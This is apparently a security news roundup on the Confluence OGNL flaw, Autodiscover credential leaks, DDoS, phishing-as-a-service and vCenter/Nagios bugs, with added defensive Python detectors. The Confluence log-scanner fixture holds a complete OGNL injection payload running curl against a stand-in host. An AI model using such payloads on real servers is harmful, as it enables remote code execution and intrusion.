More stories

  •

    More than 1 in 3 people have tried to guess someone else's password: 3 in 4 succeed

    If you worry that someone could guess your password, treat that as a sign to tighten your habits. Whether through password sharing or careless password choices, many people still leave their personal and professional accounts open to guessing, and that is a serious risk for companies and home users alike.


    New York, NY-based digital identity firm Beyond Identity surveyed 1,015 people in the US to learn more about how they choose passwords and how they generally behave with regard to online safety. Many of us already share our account passwords. Over half (50.1%) share a video streaming account, and almost as many share a music streaming account (44.9%). One in four (25.7%) share passwords to online banking. On average, respondents share three of their passwords with other people. The study also found that many people try to guess others' passwords and are often successful: over 73% of those who tried managed to guess someone's password. Over half (51.6%) try to guess their romantic partner's password, and almost one in four (24.6%) try to guess their child's.

    Over one in five (22%) try to guess their co-worker’s password, and one in five (19.9%) try to guess their ex-partner’s or boss’ password. The most common tactic is using information known about the other person (39.2%), while 18.4% check the person’s social media profiles to try and guess. Over two in five (43.7%) try to guess passwords for personal email accounts, and almost one in three (32.6%) try to guess phone passwords.
    People were most interested in gaining access to the accounts of their romantic partners. Those guessing their boss's password were usually after the boss's work email, while phones were the most common target for those guessing a romantic partner's password. Almost two in five (37.6%) never use a password generator. The average password is 15 characters long, and over one in four (27.4%) use a pet's name as a password. Over one in four (27%) use random letters, and three in ten (30.7%) substitute random characters for letters. Generation X respondents were the most likely to use a password generator, while half of the baby boomers had never used one.
    With passwords this easy to guess, it is not surprising that 18% of respondents have had an online banking account compromised. A strict password policy that demands hard-to-guess passwords drives many people to write them down on paper, which undoes much of the benefit. Two-factor authentication and authenticator apps help, but combine weak passwords with social engineering designed to trick you out of them and it is easy to see how accounts get taken over. Staying alert to scams and protecting your passwords, even with a password vault, can become more complexity than some people are willing to manage, and once that happens, someone guessing your password is a walk in the park.

  •

    This cryptocurrency miner is exploiting the new Confluence remote code execution bug

    The z0Miner cryptojacker is now weaponizing a new Confluence vulnerability to mine for cryptocurrency on vulnerable machines. 

    Trend Micro researchers said on Tuesday that the cryptocurrency mining malware is now exploiting a recently disclosed Atlassian Confluence remote code execution (RCE) vulnerability, which was only made public in August this year. Tracked as CVE-2021-26084, the vulnerability affects Confluence Server release lines including 6.6.0, 6.13.0, 7.4.0 and 7.12.0. Issued a CVSS severity score of 9.8, the critical flaw is an Object-Graph Navigation Language (OGNL) injection vulnerability that can be exploited to trigger RCE, and it is known to be actively exploited in the wild. The vulnerability was reported by Benny Jacob through Atlassian's bug bounty program. z0Miner, a Trojan and cryptocurrency mining bundle, has been updated to exploit the Confluence bug alongside an Oracle WebLogic Server RCE (CVE-2020-14882), an Elasticsearch RCE (CVE-2015-1427), Jenkins, and other code execution bugs in popular server software. Once a vulnerable server has been found and the vulnerability used to obtain remote access, the malware deploys a set of webshells to install and execute malicious files, including a .dll disguised as a Hyper-V integration service and a scheduled task that pretends to be a legitimate .NET Framework NGEN task.

    The task attempts to download and execute malicious scripts from a repository on Pastebin, but as of now the URL has been pulled. These initial actions are aimed at maintaining persistence on the infected machine. In its second stage, z0Miner scans for and kills any competing cryptocurrency miners installed on the server before launching its own, a miner that steals computing resources to generate Monero (XMR). A patch has been released to resolve CVE-2021-26084, and since threat actors will always seek to exploit new bugs for their own ends (the Microsoft Exchange Server attacks being a prime example), IT administrators should apply security fixes to vulnerable systems as quickly as possible.
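    As an added illustration (not code from the article, Trend Micro or Atlassian), the following Python scans web-server access logs for the hallmarks of an OGNL injection attempt against Confluence: the \u0027 escape used to break out of a string literal, expression delimiters, and the reflection calls that lead to Runtime.exec. The log lines are constructed, and the /pages/...action endpoints and the queryString parameter are assumptions taken from public reporting on this bug rather than from the article:

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed access-log lines (combined log format) for illustration only.
# The .action endpoints and the queryString parameter are assumptions drawn
# from public write-ups of CVE-2021-26084; the article itself names neither.
SAMPLE_LOG = r'''
203.0.113.9 - - [02/Sep/2021:10:14:02 +0000] "GET /login.action HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [02/Sep/2021:10:14:05 +0000] "POST /pages/doenterpagevariables.action?queryString=aaa%5Cu0027%2B%7BClass.forName%28%5Cu0027javax.script.ScriptEngineManager%5Cu0027%29.newInstance%28%29.getEngineByName%28%5Cu0027JavaScript%5Cu0027%29.eval%28%5Cu0027java.lang.Runtime.getRuntime%28%29.exec%28%22curl%20http%3A%2F%2Fpaste.example%2Fraw%2Fx%22%29%5Cu0027%29%7D%2B%5Cu0027 HTTP/1.1" 302 0 "-" "python-requests/2.25"
192.0.2.4 - - [02/Sep/2021:10:15:11 +0000] "POST /pages/createpage-entervariables.action?queryString=hello%20world HTTP/1.1" 200 812 "-" "Mozilla/5.0"
'''

# Tokens that have no business inside a page-variable parameter: the \u0027
# escape used to break out of the OGNL string literal, expression delimiters,
# and the reflection/scripting calls used to reach Runtime.exec.
OGNL_MARKERS = (
    r"\u0027", "#{", "${", "Class.forName", "@java.lang",
    "ScriptEngineManager", "getRuntime(",
)

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def suspicious_params(target):
    """Return names of query parameters whose decoded value carries OGNL markers."""
    if "?" not in target:
        return []
    params = parse_qs(target.split("?", 1)[1], keep_blank_values=True)
    hits = []
    for name, values in params.items():
        # parse_qs decoded once; a second unquote catches double-encoded payloads
        if any(m in unquote(v) for v in values for m in OGNL_MARKERS):
            hits.append(name)
    return hits


def scan_log(text):
    """Scan log lines and return one alert per request that looks like an OGNL injection attempt."""
    alerts = []
    for line in text.strip().splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        target = m.group("target")
        hits = suspicious_params(target)
        if hits:
            alerts.append({
                "ip": m.group("ip"),
                "time": m.group("ts"),
                "path": target.split("?", 1)[0],
                "params": hits,
                "status": int(m.group("status")),
            })
    return alerts


if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG):
        print(f"{a['time']} {a['ip']} {a['path']} params={a['params']} status={a['status']}")
```

    The markers are deliberately broad: a legitimate page variable never contains an OGNL expression, so any hit on an .action endpoint is worth a look, and a 302 or 200 on such a request means the server processed the payload rather than rejecting it. Run it over the access logs of any Confluence instance that was exposed between disclosure and patching.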

  •

    Microsoft Autodiscover abused to collect web requests, credentials

    A “design flaw” in the Microsoft Autodiscover protocol was subject to an investigation by researchers who found they were able to harvest domain credentials. 

    On Wednesday, Guardicore Labs' AVP of Security Research Amit Serper published the results of an analysis of Autodiscover, the protocol Exchange clients use to find and configure access to their mailbox server, a process in which the client authenticates to the server. There are different iterations of the protocol in use. Guardicore explored an implementation of Autodiscover based on POX XML and found a "design flaw" that can be exploited to 'leak' web requests to Autodiscover domains outside of a user's domain, as long as they are in the same top-level domain (TLD). To test the protocol, the team first registered a number of Autodiscover domains under various TLD suffixes, including Autodiscover.com.br, Autodiscover.com.cn, Autodiscover.com.fr and Autodiscover.com.uk. These domains were pointed at a Guardicore web server, and the researchers say they "were simply waiting for web requests for various Autodiscover endpoints to arrive." The "back-off" procedure is described as the "culprit" of the leak: when a client cannot reach the URLs it builds from the domain in the user's email address, it "fails up" to a shorter domain. "Meaning, the result of the next attempt to build an Autodiscover URL would be: http://Autodiscover.com/Autodiscover/Autodiscover.xml," the researchers explained. "This means that whoever owns Autodiscover.com will receive all of the requests that cannot reach the original domain. […] To our surprise, we started seeing significant amounts of requests to Autodiscover endpoints from various domains, IP addresses, and clients."

    In total, Guardicore was able to capture 372,072 Windows domain credentials and 96,671 unique sets of credentials from sources including Microsoft Outlook and email clients between April 16 and August 25, 2021. Some sets were sent via HTTP basic authentication.
    Chinese companies, food manufacturers, utility firms, shipping and logistics organizations, and more were among the sources. "The interesting issue with a large amount of the requests that we received was that there was no attempt on the client's side to check if the resource is available or even exists on the server before sending an authenticated request," the team explained. Guardicore also built an attack in which an attacker controlling the relevant TLD domains downgrades credentials offered under stronger schemes, such as NTLM and OAuth, to HTTP basic authentication. Serper told ZDNet, "the protocol flaw isn't new; we were just able to exploit it at a massive scale." Past research by Shape Security, published in 2017, explores Autodiscover and its potential for abuse (.PDF), but that paper focuses on Autodiscover implementations in mobile email clients. Guardicore says it has "initiated responsible disclosure processes with some of the vendors affected" by the latest discovery. To mitigate the issue, Guardicore says that Autodiscover TLD domains should be blocked at the firewall, and that support for basic authentication should be disabled when Exchange is set up, as basic authentication is "the same as sending a password in clear text over the wire." Update 20.39 BST: "We are actively investigating and will take appropriate steps to protect customers," Jeff Jones, Sr. Director at Microsoft said in a statement. "We are committed to coordinated vulnerability disclosure, an industry standard, collaborative approach that reduces unnecessary risk for customers before issues are made public. Unfortunately, this issue was not reported to us before the researcher marketing team presented it to the media, so we learned of the claims today."
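    The back-off behaviour described above, as an added example that is not Guardicore's or Microsoft's code. It models the "fail-up" in a few lines of Python so you can see which hosts a given address would leak to, contrasts it with a variant that refuses to leave the user's domain, derives the egress blocklist Guardicore recommends, and decodes a constructed basic-auth header to show why that downgrade is equivalent to sending the password in clear text. The exact URL order a real client uses is simplified here:

```python
import base64
from urllib.parse import urlsplit

AUTODISCOVER_PATH = "/autodiscover/autodiscover.xml"

# Constructed sample: what a captured request's Authorization header looks like
# once a client has been downgraded to HTTP basic authentication.
SAMPLE_BASIC_HEADER = "Basic Q09SUFxqZG9lOlN1bW1lcjIwMjE="


def email_domain(email):
    """Domain part of an address, lower-cased; raises on input that cannot yield a host."""
    local, _, domain = email.rpartition("@")
    if not local or not domain or "." not in domain:
        raise ValueError(f"not a usable e-mail address: {email!r}")
    return domain.lower().strip(".")


def flawed_candidates(email):
    """Simplified model of the 'fail-up' back-off described in the article.

    After the URLs built from the user's own domain fail, the leftmost label is
    stripped and autodiscover.<rest> is tried over plain HTTP. This is an
    illustrative reconstruction, not Microsoft's or Guardicore's code.
    """
    domain = email_domain(email)
    urls = [
        f"https://{domain}{AUTODISCOVER_PATH}",
        f"https://autodiscover.{domain}{AUTODISCOVER_PATH}",
        f"http://autodiscover.{domain}{AUTODISCOVER_PATH}",
    ]
    labels = domain.split(".")
    for i in range(1, len(labels)):
        urls.append(f"http://autodiscover.{'.'.join(labels[i:])}{AUTODISCOVER_PATH}")
    return urls


def in_user_domain(host, domain):
    host = host.lower()
    return host == domain or host.endswith("." + domain)


def leaked_hosts(email):
    """Hosts outside the user's own domain that the flawed back-off would contact."""
    domain = email_domain(email)
    return [urlsplit(u).hostname for u in flawed_candidates(email)
            if not in_user_domain(urlsplit(u).hostname, domain)]


def safe_candidates(email):
    """Hardened variant: keep only URLs whose host stays inside the user's domain."""
    domain = email_domain(email)
    return [u for u in flawed_candidates(email)
            if in_user_domain(urlsplit(u).hostname, domain)]


def egress_blocklist(emails):
    """Hosts to block at the perimeter for a set of users, per Guardicore's mitigation advice."""
    block = set()
    for e in emails:
        block.update(leaked_hosts(e))
    return sorted(block)


def decode_basic_auth(header_value):
    """What the receiving server sees when basic auth is used: user and password in the clear."""
    scheme, _, token = header_value.partition(" ")
    if scheme.lower() != "basic":
        return None
    user, _, password = base64.b64decode(token).decode("utf-8", "replace").partition(":")
    return user, password


if __name__ == "__main__":
    for e in ("user@example.com", "user@example.com.br"):
        print(e, "-> leaks to", leaked_hosts(e))
    print("blocklist:", egress_blocklist(["a@example.com", "b@example.com.br"]))
    print("basic auth decodes to:", decode_basic_auth(SAMPLE_BASIC_HEADER))
```

    The blocklist is the practical output: feed your users' mail domains through egress_blocklist and deny those hosts at the proxy or firewall, then confirm with the basic-auth decoder why disabling basic authentication on the Exchange side matters as well, since a single downgraded request hands over the password in full.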

  •

    DDoS attacks are becoming more prolific and more powerful, warn cybersecurity researchers

    There’s been a rise in distributed denial of service (DDoS) attacks in recent months in what cybersecurity researchers say is a record-breaking number of incidents. According to a report by cybersecurity researchers at Netscout, there were 5.4 million recorded DDoS attacks during the first half of 2021 – a figure that represents an 11% rise compared with the same period last year. 


    A DDoS attack is a crude but effective form of cyberattack: attackers flood the victim's network or servers with so much traffic that the infrastructure is overwhelmed by the volume of requests, slowing services down or taking them offline entirely and preventing legitimate users from reaching them. Often, the machines used to launch DDoS attacks, which can be anything that connects to the internet, from servers and desktop computers to Internet of Things devices, are controlled by attackers as part of a botnet. The real owners of the devices are unlikely to know that their device has been hijacked in this way. In some cases, DDoS attacks are simply designed to cause disruption, launched because the attackers can. In other instances there is an extortion element at play, with attackers threatening to launch a DDoS attack against a victim who does not give in to a demand for payment. But it is not just the rise in the number of DDoS attacks that makes them disruptive; cyber criminals are adopting new techniques to help their attacks bypass cloud-based and on-premise defences.

    “The tooling behind these attacks has matured over the years,” Hardik Modi, Netscout area vice president of engineering, threat and mitigation products, told ZDNet. For example, cyber criminals are increasingly using multi-vector DDoS attacks, which direct traffic at the victim through many different avenues at once, so that if traffic from one angle is disrupted or shut down, the others continue to flood the target's network. In many cases, the attackers tailor the mix of vectors to the weaknesses of the specific target.

    Researchers note that multi-vector attacks are getting more diverse (a vector is essentially a method or technique used in the attack, such as DNS reflection or a TCP SYN flood). In 2020, the largest of these attacks used 26 vectors. During the first half of 2021, there have been a number of attacks using between 27 and 31 different vectors, and an attacker can switch between them to make the attack harder to disrupt. DDoS attacks have become more effective during the past year because of the added reliance on online services: disruption to services that people depend on in both their professional and personal lives can have a significant impact. However, in the majority of cases it is possible to defend against DDoS attacks by implementing the industry's best current practices to maintain availability of services during an incident. These practices include setting specific network access policies as well as regularly testing DDoS defences to confirm they can protect the network from attack.
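    The following Python, added here and not from Netscout, classifies constructed flow records into the two vectors named above (TCP SYN flood and DNS reflection) plus a few more reflection ports as a generalisation of the same idea, and reports per victim whether more than one vector is active at once, which is what makes an attack multi-vector. The thresholds and the record layout are assumptions:

```python
from collections import Counter, defaultdict

# UDP source ports whose replies are commonly abused for reflection/amplification.
# The article names DNS reflection and TCP SYN floods; the other ports are
# added here as a generalisation of the same idea.
REFLECTION_PORTS = {53: "dns_reflection", 123: "ntp_reflection",
                    161: "snmp_reflection", 1900: "ssdp_reflection"}

VICTIM = "198.51.100.10"

# Constructed NetFlow-style records, not real telemetry. Addresses are from
# documentation ranges.
SAMPLE_FLOWS = (
    # SYN flood: 40 spoofed sources, one SYN each, no handshake completes
    [{"src": f"203.0.113.{i}", "dst": VICTIM, "proto": "tcp", "sport": 40000 + i,
      "dport": 443, "flags": "S", "bytes": 60, "packets": 1} for i in range(1, 41)]
    # DNS reflection: large answers from port 53 of 30 open resolvers the victim never queried
    + [{"src": f"192.0.2.{i}", "dst": VICTIM, "proto": "udp", "sport": 53,
        "dport": 50000 + i, "flags": "", "bytes": 3500, "packets": 1} for i in range(1, 31)]
    # ordinary traffic to the same host
    + [{"src": "198.51.100.77", "dst": VICTIM, "proto": "tcp", "sport": 51000,
        "dport": 443, "flags": "SAPF", "bytes": 18000, "packets": 24}]
    # a single host probing another server: SYNs, but far below attack thresholds
    + [{"src": "198.51.100.5", "dst": "198.51.100.20", "proto": "tcp", "sport": 52000 + p,
        "dport": p, "flags": "S", "bytes": 60, "packets": 1} for p in (22, 80, 443, 8080, 8443)]
)


def classify_flow(flow):
    """Map one flow record to an attack vector name, or None if it looks benign."""
    if flow["proto"] == "tcp" and flow["flags"] == "S" and flow["packets"] <= 2:
        return "tcp_syn_flood"
    if flow["proto"] == "udp" and flow["sport"] in REFLECTION_PORTS and flow["bytes"] >= 1000:
        return REFLECTION_PORTS[flow["sport"]]
    return None


def detect_attacks(flows, min_flows=20, min_sources=10):
    """Per destination, report vectors that exceed both a flow count and a distinct-source
    threshold, and whether more than one vector is active at once (a multi-vector attack)."""
    sources = defaultdict(lambda: defaultdict(set))   # dst -> vector -> {src}
    counts = Counter()                                  # (dst, vector) -> flows
    for f in flows:
        vector = classify_flow(f)
        if vector is None:
            continue
        sources[f["dst"]][vector].add(f["src"])
        counts[(f["dst"], vector)] += 1
    report = {}
    for dst, vectors in sources.items():
        active = sorted(v for v, srcs in vectors.items()
                        if counts[(dst, v)] >= min_flows and len(srcs) >= min_sources)
        if active:
            report[dst] = {"vectors": active, "multi_vector": len(active) > 1}
    return report


if __name__ == "__main__":
    for dst, info in detect_attacks(SAMPLE_FLOWS).items():
        print(dst, info)
```

    Requiring both a flow count and a distinct-source count keeps a single host's port scan out of the report while still catching a botnet whose members each send one packet; tune the thresholds to your baseline before relying on it, and note that per-vector reporting is what lets you see an attacker rotating vectors, as the article describes.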

  •

    This phishing-as-a-service operation is responsible for many attacks against businesses, says Microsoft

    Microsoft is shining a light on a phishing-as-a-service operation that sells fake login pages for cloud services like OneDrive, helping non-technical cybercriminals steal business users' usernames and passwords. Phishing kits are nothing new, but this phishing-as-a-service operation caught the attention of Microsoft's security teams because it lowers the bar to quality phishing even further.


    That business, called BulletProofLink among other names, provides email and web site templates as phishing kits do, but also offers email delivery, hosting and credential theft as services. It claims to provide 'fully undetected' (FUD) links and logs, and is sold as a weekly, bi-weekly, monthly or annual subscription. As Microsoft outlines, phishing service providers are one link in the chain that helps ransomware gangs deploy file-encrypting ransomware, chiefly by supplying passwords that attackers can try on target networks. If the ransomware buyer is lucky, the credentials include passwords for high-value admin accounts, allowing greater movement within a compromised network. “These [FUD] phishing service providers host the links and pages and attackers who pay for these services simply receive the stolen credentials later on. Unlike in certain ransomware operations, attackers do not gain access to devices directly and instead simply receive untested stolen credentials,” the Microsoft 365 Defender Threat Intelligence Team notes in a blogpost. Microsoft is concerned about businesses like these because they offer dozens of templates for the login pages of popular web services and let anyone on a small budget set up for theft or extortion. BulletProofLink currently offers “login scam” pages for Microsoft OneDrive, LinkedIn, Adobe, Alibaba, American Express, AOL, AT&T, Dropbox, and Google Docs.

    It is also worried about “double theft”, where the phishing service provider captures credentials on behalf of one customer and then sells the same credentials to other customers. BulletProofLink markets itself openly on the web and on underground forums, and is also known as BulletProftLink or Anthrax. It has even published 'how-to' videos on YouTube and Vimeo to help customers use its fraud tools. Microsoft published its research into the operation to help customers refine email-filtering rules and adopt the security technologies it offers. While a phishing kit is sold once, as a ZIP file of templates for setting up a bogus login page or emails, phishing-as-a-service includes the whole package. The operation caught Microsoft's attention while it was investigating a phishing campaign that used BulletProofLink services. The campaign used some 300,000 subdomains with a technique Microsoft calls “infinite subdomain abuse”, which applies when an attacker has compromised a website's DNS server, or when a compromised site's DNS is configured to allow wildcard subdomains.

    These subdomains “allow attackers to use a unique URL for each recipient while only having to purchase or compromise one domain for weeks on end”, Microsoft says. They are useful because the attacker can simply compromise the DNS of a site and not bother with hacking the site itself, and they let phishing businesses generate large numbers of unique URLs that are hard to detect. Ransomware service provider models are also influencing how phishing businesses operate. One notable ransomware technique is to steal data before encrypting it and then either sell that data or use it as leverage during extortion attempts. “We have observed this same workflow in the economy of stolen credentials in phishing-as-a-service,” Microsoft says. “With phishing kits, it is trivial for operators to include a secondary location for credentials to be sent to and hope that the purchaser of the phish kit does not alter the code to remove it. This is true for the BulletProofLink phishing kit, and in cases where the attackers using the service received credentials and logs at the end of a week instead of conducting campaigns themselves, the PhaaS operator maintained control of all credentials they resell.”
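    As an added example (not Microsoft's detection logic), this Python spots the "infinite subdomain abuse" pattern in a batch of URLs taken from mail logs or a proxy: many distinct, random-looking subdomains under a single registrable domain. The URLs are constructed on the reserved .example TLD, the registrable-domain split is simplified to the last two labels, and the thresholds are assumptions:

```python
import math
from collections import Counter, defaultdict
from urllib.parse import urlsplit

# Constructed URLs modelled on the technique Microsoft describes: one domain
# under attacker control (or with a compromised wildcard DNS record), a
# different random subdomain per recipient. All names use the reserved
# .example TLD.
SAMPLE_URLS = [
    f"https://{token}.login-portal.example/onedrive/sign-in"
    for token in ("a8f3k2q9d1", "p0x7m4n2b6", "z2w9e5r1t8",
                  "q4y7u1i3o6", "h6j2k8l4m0", "v3c7b1n5x9")
] + [
    # a legitimate domain with several ordinary, human-chosen subdomains
    f"https://{sub}.corp.example/" for sub in ("www", "api", "static", "img", "mail")
] + [
    "https://docs.example/help",
    "https://mail.example/inbox",
]


def registrable_domain(host):
    """Split a host into (registrable domain, subdomain part).

    Simplification: the registrable domain is taken to be the last two labels.
    A real implementation should use the Public Suffix List so that
    co.uk-style suffixes are handled correctly.
    """
    labels = host.lower().strip(".").split(".")
    if len(labels) < 2:
        return host.lower(), ""
    return ".".join(labels[-2:]), ".".join(labels[:-2])


def shannon_entropy(s):
    """Bits per character; random tokens score high, dictionary words low."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def find_wildcard_abuse(urls, min_unique=5, min_entropy=3.0):
    """Flag registrable domains seen with many distinct, high-entropy subdomains."""
    subdomains = defaultdict(set)
    for u in urls:
        host = urlsplit(u).hostname or ""
        base, sub = registrable_domain(host)
        if sub:
            subdomains[base].add(sub)
    flagged = {}
    for base, subs in subdomains.items():
        if len(subs) < min_unique:
            continue
        # score only the leftmost label, which is the part rotated per recipient
        mean_entropy = sum(shannon_entropy(s.split(".")[0]) for s in subs) / len(subs)
        if mean_entropy >= min_entropy:
            flagged[base] = {"unique_subdomains": len(subs),
                             "mean_entropy": round(mean_entropy, 2)}
    return flagged


if __name__ == "__main__":
    for base, info in find_wildcard_abuse(SAMPLE_URLS).items():
        print(base, info)
```

    Counting unique subdomains alone would also flag a busy CDN or corporate domain, which is why the check pairs the count with the entropy of the leftmost label: human-chosen names like www, api and static score low, per-recipient tokens score near the maximum for their alphabet. Once a domain is flagged, blocking the registrable domain rather than individual hostnames is what actually stops the campaign, since the attacker can mint new subdomains at will.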

  •

    RCE is back: VMware details file upload vulnerability in vCenter Server

    If you have not patched vCenter in recent months, do so at your earliest convenience. Following its remote code execution hole in vCenter in May, VMware has warned of a critical vulnerability in the analytics service of vCenter Server. “A file upload vulnerability that can be used to execute commands and software on the vCenter Server Appliance. This vulnerability can be used by anyone who can reach vCenter Server over the network to gain access, regardless of the configuration settings of vCenter Server,” the company said in a blog post. Labelled CVE-2021-22005, the vulnerability has a CVSSv3 score of 9.8 and means a malicious actor only needs network access to port 443 and a file crafted to exploit an unpatched server. The vulnerability affects versions 6.7 and 7.0 of the vCenter Server Appliance; 7.0 U2c (build 18356314, released August 24) and 6.7 U3o (build 18485166, released September 21) and later builds contain the fix. vCenter 6.5 is not affected. For those looking for a workaround instead of applying a patch, VMware has issued instructions; the workaround will be reverted once the server instance is patched. VMware said users should patch immediately.

    “The ramifications of this vulnerability are serious and it is a matter of time — likely minutes after the disclosure — before working exploits are publicly available,” it said. Other vulnerabilities addressed in VMware's advisory included CVE-2021-21991, a CVSSv3 8.8 local privilege escalation involving session tokens that would let users gain administrator access; CVE-2021-22006, a CVSSv3 8.3 reverse proxy bypass that could allow access to restricted endpoints; and CVE-2021-22011, which could allow unauthenticated manipulation of VM network settings. All up, of the 19 vulnerabilities listed in the advisory, 10 were found by George Noseevich and Sergey Gerasimov of SolidLab. Elsewhere, Claroty Team 82 detailed how it chained a number of vulnerabilities in Nagios XI to gain a reverse shell with root-level remote code execution. Although 11 vulnerabilities were found, four of which were handed a CVSSv3 score of 9.8 and included an SQL injection, only two were needed for the reverse shell: CVE-2021-37343, a path traversal vulnerability that allows code to be executed as the Apache user, and CVE-2021-37347, which allows local privilege escalation. The auto-login feature of Nagios XI, which grants read-only access to the Nagios dashboard without credentials, greatly expanded the attack surface, Team 82 said. “While this feature might be useful for NOC purposes, allowing users to easily connect to the platform and view information without the need for credentials also allows attackers to gain access to a user account in the platform, thus rendering any post-auth vulnerability exploitable without authentication,” they said. Patched versions of vulnerable Nagios XI products were released in August.
    One reverse root shell coming up (Image: Claroty)

  •

    Democracy advocate finds internet freedom has declined globally for 11th consecutive year

    Democracy advocate Freedom House has published findings that indicate a growing number of governments are forcing tech businesses to comply with online censorship and surveillance. The findings were released as part of the non-profit, non-governmental organisation's (NGO) annual Freedom on the Net 2021 report [PDF], which found that 48 out of 70 countries covered in the report — which account for 88% of the world's internet users — have pursued new rules for tech companies on content, data, or competition over the past year. “While some moves reflected legitimate attempts to mitigate online harms, rein in misuse of data, or end manipulative market practices, many new laws imposed excessively broad censorship and data-collection requirements on the private sector,” the report said. Of specific concern to the NGO was that at least 24 countries have passed or announced new laws or rules governing how platforms treat content, which it worries could lead to increased censorship of political dissent, investigative reporting, and expressions of ethnic, religious, sexual, or gender identity. According to Freedom House, this has culminated in global internet freedom declining again for the 11th consecutive year, with the greatest deteriorations being in Myanmar, Belarus, and Uganda. Freedom House's measurement of internet freedom is done through assessing 21 different indicators pertaining to obstacles to access, limits on content, and violations of user rights, it explained. China, meanwhile, remained the world's worst abuser of internet freedom, the NGO claimed. This was due to the country introducing new legislation criminalising online expression that insults members of the armed forces, “heroes”, and “martyrs”, and its continued online censorship.

    It also said China's crackdown on tech has been “among the most aggressive” in addressing anti-competitive practices, raising concerns that the government is more interested in reining in the private sector's autonomy and influence than in creating fairer markets. Other statistics in the report: 80% of the countries analysed arrested people for their online speech; authorities in 64% of those countries deployed pro-government commentators to manipulate online discussions; 41% of countries disconnected internet or mobile networks for political reasons; and 46% of countries blocked or restricted social media platforms, primarily during protests and elections. On the surveillance front, authorities in at least 45 of the 70 countries covered by the report are suspected of having access to sophisticated spyware or data-extraction technology supplied by companies like NSO Group, Cellebrite, Circles, and FinFisher, Freedom House said. In providing this warning, the organisation has called for policymakers responsible for drafting data privacy laws to focus on protecting users while preventing greater fragmentation of the internet, such as by ensuring government surveillance programs adhere to the International Principles on the Application of Human Rights to Communications Surveillance. It also said policymakers should view encryption as fundamental to cybersecurity, commerce, and human rights, and that weakening encryption would endanger the lives of activists, journalists, and members of marginalised communities. For other areas of legislation, Freedom House said competition policy should foster innovation that responds to user demand for greater personalisation, security, and interoperability, and regulation should ensure that power does not accumulate in the hands of a few dominant actors, whether in government or the private sector.

  •

    Chrome willing to take performance hit to prevent use-after-free bugs

    The Chrome security team has said it is willing to make the browser slightly slower if the tradeoff is a much more secure browser. Pointing to earlier figures showing that 70% of its serious security bugs are memory safety problems, the team said in a blog post that it was looking at three approaches: compile-time checks, runtime checks, and a memory-safe language. Because Chrome is written in C++, the first option is not available to it, so it is looking at runtime checks such as MiraclePtr. “MiraclePtr prevents use-after-free bugs by quarantining memory that may still be referenced. On many mobile devices, memory is very precious and it’s hard to spare some for a quarantine,” the team said. “Nevertheless, MiraclePtr stands a chance of eliminating over 50% of the use-after-free bugs in the browser process — an enormous win for Chrome security, right now.” At the same time, the team is continuing to look at how to integrate the Rust language, whose compile-time checks carry no runtime performance cost. “There are open questions about whether we can make C++ and Rust work well enough together,” the team said.

    “Even if we started writing new large components in Rust tomorrow, we’d be unlikely to eliminate a significant proportion of security vulnerabilities for many years. And can we make the language boundary clean enough that we can write parts of existing components in Rust? We don’t know yet.” The team said it is trying out some limited use of Rust, but this has yet to reach production builds of Chrome. Created at Mozilla, Rust has been used in parts of Firefox since 2016, and Google's Android team has backed efforts to bring Rust into the Linux kernel.